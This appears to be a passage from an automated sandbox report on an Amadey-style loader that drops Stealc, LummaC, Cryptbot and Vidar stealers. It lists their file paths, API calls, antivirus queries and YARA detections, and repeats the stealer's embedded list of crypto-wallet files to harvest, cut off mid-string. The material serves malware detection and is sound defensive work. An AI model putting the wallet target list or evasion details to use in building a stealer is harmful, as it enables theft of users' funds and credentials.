Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00786920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

17_2_00786920

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00787850 GetProcessHeap,HeapAlloc,GetUserNameA,

17_2_00787850

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00787A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

17_2_00787A30

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_6C8A8390 NSS_GetVersion,

17_2_6C8A8390

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE

Jump to behavior

Source: svchost.exe, 00000005.00000002.3779242730.0000015550702000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000005.00000002.3779242730.0000015550702000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.3443481489.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000002.3474153244.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 13.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.axplong.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1425044391.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1376722618.0000000000A01000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1397149648.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.1830413702.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1285449632.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1356529894.0000000004880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1384745140.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Cryptbot

Source: Yara match	File source: 00000012.00000003.2190552389.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2193872573.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Offnewhere.exe PID: 7260, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 2864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 550b7cfe5f.exe PID: 5732, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 17.0.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.stealc_default2.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2162755046.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1886878201.000000000078E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1886855224.0000000000771000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local 